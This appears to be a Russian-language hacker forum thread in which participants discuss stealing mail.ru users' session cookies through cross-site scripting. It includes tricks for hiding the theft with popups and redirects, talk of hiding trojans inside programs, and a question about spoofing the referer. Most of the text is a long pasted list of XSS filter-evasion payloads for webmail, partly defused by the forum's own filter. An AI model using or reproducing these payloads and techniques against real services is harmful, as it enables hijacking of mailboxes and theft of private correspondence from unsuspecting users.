JazzzSummerMan Без проблем продемонстрирую! Я сам удивился, когда увидел, что эти дибилы на мейле установили привязку куков к основному домену, т.е. на поддоменах они тоже работают! Я ж сказал, сточи в асю!! Безз проблем все покажу
вобще-то да. есть такое. Через чат потому что в ящики заходили, верно. Но все же я продолжаю утверждать что такие xss , которые требуют принудительного выполнения в браузере жертвы не очень эффективны)).
я вообще то раньше этим методом не интересовался но сейчас вижу что это очень продуктивный метод для некоторых применений попробуй зайти в свой почтовый ящик на майл ру и в другом окне открыть чат. и попробуй открыть окно со с фраме котороя будет содержать тотже чат. я думаю что из фраме добраться можно только до кук которые были записаны в этот фраме а к кукам что уже есть на компе фраме не имеет доступа.
Гоблен не совсем понял что ты имел ввиду, но эта тема уже из разряда политики безопасности cookies вроде, тут есть как общепринятые правила, так и методы обхода защиты хм Согласен что один из способов, но активный xss проще в использовании и легче ищется. про IdealBB знамо дело, если комп запомнен, то пасс сохранен http://antichat.ru/txt/idealbb/
ты знаешь как обойти эту проблему? я применил два не очень красивых способа - открывать попуп с ххс или с левой страницы посылать на страницу с ххс который не только п**дит куки но и переадресовывает на беспонтовую другую страницу.
да и чисто поясню письмами со скриптом можно на***вать только нестолкнувшихся с таким феноменом людей, а вот бывалые пострадавшие никогда неоткроют никакое письмо через веб- они сейчас все пользуються разной х**той типо оутлоок или бат или еще че нибудь.
оутлук\бат = трой -)) я щас сижу тока через веб, потому как сам начал занимаца троянами и знаю что можно сделать -)) даже не догадаешся то что его подцепил -))
читай внимательнее. троян. если *.exe не палит антивирь, не факт то, что это не троян. Трояны могут быть в программе, которой ты сам разрешишь доступ в веб, например какой нить мэйл флудер или чат-крякер. спрятать его труда не состовляет.
я внимательно читаю Какая разница палится или нет прога антивирусом, как они работают и тд. Это EXE. В новых версиях Бэт вообще нельзя её открыть из самого клиента без предварительного сохранения на диске. И где здесь то что ты назвал "подцепить троян и не заметить"? Думал что у тебя есть способы обхода ограничений в потовых клиентах.
Гоблен вот тебе программа от LittleLamer для тестирования почты на XSS, скачай её, сразу разберешься что к чему, и мне кажется что ты сразу найдешь кучу альтернатив http://forum.antichat.ru/attachment.php?attachmentid=71
ну ты сам хоть знаешь альтернативу? а little lamer молодец набрал много вариантов тока зачем там програмка если и так все это можно послать? и вот что получается: <font face="Verdana" size=3 color=maroon>XSS</font><font face="Verdana" size=2 color=green> security tester v1.1</font><br> <xscript><!-- alert(1) --></xscript> <xscript src=http://xsstest.narod.ru/2.js><!-- --></xscript> <xbody filtered-onLoad=alert(2)> <xbody filtered-onlOaD=alert(3)> <image src=http://xsstest.narod.ru/1.jpg filtered-onload=alert(5)> <image src=http://xsstest.narod.ru/1.jpg filtered-onlOaD=alert(6)> <image src=xjavascript:alert(7)> <image src="" filtered-onerror=alert(8)> <image src='' filtered-onerror=alert(9)> <img src="" filtered-onerror=alert(10)> <img src='' filtered-onerror=alert(11)> <xembed src=xjavascript:alert(12);this.avi> <xembed src=xjavascript:alert(13);this.wav> <img src=http://jstest.narod.ru/1.jpg filtered-onload=alert(14)> <img src=http://jstest.narod.ru/1.jpg filtered-onlOaD=alert(15)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"> <hr xstyle=background:url(xjavascript:alert(17))> <span xstyle=background:url(xjavascript:alert(18))></span> <hr xstyle=top:expression(alert(19))> <span xstyle=top:expression(alert(20))></span> <span sss="alert(21);this.sss=null" xstyle=top:expression(eval(this.sss));></span> <span sss='alert(22);this.sss=null' xstyle=top:expression(eval(this.sss));></span> <span sss=alert(23);this.sss=null xstyle=top:expression(eval(this.sss));></span> <hr sss="alert(24);this.sss=null" xstyle=top:expression(eval(this.sss));> <hr sss='alert(25);this.sss=null' xstyle=top:expression(eval(this.sss));> <hr sss=alert(26);this.sss=null xstyle=top:expression(eval(this.sss));> <xstyle type="text/css"><!-- @import url(javascript:alert(27)); --></xstyle> <xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(28)></xobject> <xiframe src=xjavascript:alert(29)> <a href=xjavascript:alert(30) target="_blank">click me</a> <image src=xvbscript:alert(32)> <xembed src=xvbscript:alert(33);this.avi> <xembed src=xvbscript:alert(34);this.wav> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"> <hr xstyle=background:url(xvbscript:alert(36))> <span xstyle=background:url(xvbscript:alert(37))></span> <xstyle type="text/css"><!-- @import url(vbscript:alert(38)); --></xstyle> <xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xvbscript:alert(39)></xobject> <xiframe src=xvbscript:alert(40)> <a href=xvbscript:alert(41) target="_blank">click me</a> <image src=xjavascript:alert(43)> <xembed src=xjavascript:alert(44);this.avi> <xembed src=xjavascript:alert(45);this.wav> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"> <hr xstyle=background:url(xjavascript:alert(47))> <span xstyle=background:url(xjavascript:alert(48))></span> <xstyle type="text/css"><!-- @import url(javascript:alert(49)); --></xstyle> <xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(50)></xobject> <xiframe src=xjavascript:alert(51)> <a href=xjavascript:alert(52) target="_blank">click me</a> <image src=xjavascript:alert(54)> <xembed src=xjavascript:alert(55);this.avi> <xembed src=xjavascript:alert(56);this.wav> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"> <hr xstyle=background:url(xjavascript:alert(58))> <span xstyle=background:url(xjavascript:alert(59))></span> <xstyle type="text/css"><!-- @import url(javascript	:alert(60)); --></xstyle> <xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(61)></xobject> <xiframe src=xjavascript:alert(62)> <a href=xjavascript:alert(63) target="_blank">click me</a> <image src=xjavascript:alert(65)> <xembed src=xjavascript:alert(66);this.avi> <xembed src=xjavascript:alert(67);this.wav> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"> <hr xstyle=background:url(xjavascript:alert(69))> <span xstyle=background:url(xjavascript:alert(70))></span> <xstyle type="text/css"><!-- @import url(javascript
:alert(71)); --></xstyle> <xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(72)></xobject> <xiframe src=xjavascript:alert(73)> <a href=xjavascript:alert(74) target="_blank">click me</a> <image src=xjavascript:alert(76)> <xembed src=xjavascript:alert(77);this.avi> <xembed src=xjavascript:alert(78);this.wav> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"> <hr xstyle=background:url(xjavascript:alert(80))> <span xstyle=background:url(xjavascript:alert(81))></span> <xstyle type="text/css"><!-- @import url(javascript
:alert(82)); --></xstyle> <xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(83)></xobject> <xiframe src=xjavascript:alert(84)> <a href=xjavascript:alert(85) target="_blank">click me</a> <image src=xjavascript:alert(87)> <xembed src=xjavascript:alert(88);this.avi> <xembed src=xjavascript:alert(89);this.wav> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"> <hr xstyle=background:url(xjavascript:alert(91))> <span xstyle=background:url(xjavascript:alert(92))></span> <xstyle type="text/css"><!-- @import url(javascript :alert(93)); --></xstyle> <xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=xjavascript:alert(94)></xobject> <xiframe src=xjavascript:alert(95)> <a href=xjavascript:alert(96) target="_blank">click me</a> <image src=xjavascript:alert(98)> <xembed src=xjavascript:alert(99);this.avi> <xembed src=xjavascript:alert(100);this.wav> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"> <hr xstyle=background:url(xjavascript:alert(102))> <span xstyle=background:url(xjavascript:alert(103))></span> <xstyle type="text/css"><!-- @import url(javascript :alert(104)); --></xstyle> <xobject classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389> <param name=url value=xjavascript:alert(105)></xobject> <xiframe src=javascript <a href=xjavascript:alert(106)>click me</a> <image src="" filtered-onERror=alert(107)> <image src='' filtered-onERror=alert(108)> <img src="" filtered-onERror=alert(109)> <img src='' filtered-onERror=alert(110)> <image src=""filtered-onerror=alert(111)> <image src=''filtered-onerror=alert(112)> <img src=""filtered-onerror=alert(113)> <img src=''filtered-onerror=alert(114)> <image src=""filtered-onErRor=alert(115)> <image src=''filtered-onErRor=alert(116)> <img src=""filtered-onErRor=alert(117)> <img src=''filtered-onErRor=alert(118)> <image src="a"filtered-onError=alert(119)> <image src='a'filtered-onError=alert(120)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onError=alert(121)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onError=alert(122)> <image src="a"filtered-onErRor=alert(123)> <image src='a'filtered-onERror=alert(124)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(125)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(126)> <image src="a" filtered-onErRor=alert(127)> <image src='a' filtered-onErRor=alert(128)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif" filtered-onErRor=alert(129)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif" filtered-onErRor=alert(130)> <image src="a"filtered-onerror=alert(131)> <image src='a'filtered-onerror=alert(132)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onerror=alert(133)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onerror=alert(134)> <image src="a"filtered-onErRor=alert(135)> <image src='a'filtered-onErRor=alert(136)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(137)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif"filtered-onErRor=alert(138)> так что эти приколы уже непойдут. да и ты знаешь можно ли как нибудь технично яваскриптом вставить левый реферер? я нет и приходится делать это через цги. скажи если знаешь.
Не знаю, потому что не собирался искать без надобности Можно и так посылать, но во-первых СМТП-шник готовый есть, который в хтмл шлет), а во-вторых процесс автоматизируется, для всяких почт можно сразу использовать. и со своими настройками. Ты же понимаешь принцип обхода фильтров. Так найди свои приколы, тема не новая, кто за тебя будет рутиной заниматься хм.. явоскриптом никак нельзя имхо , реф на уровне заголовков все-таки. Тебе это нужно чтобы настроить пересылку в почте, верно? Есть кое-какие соображения. поделюсь позже, если получится
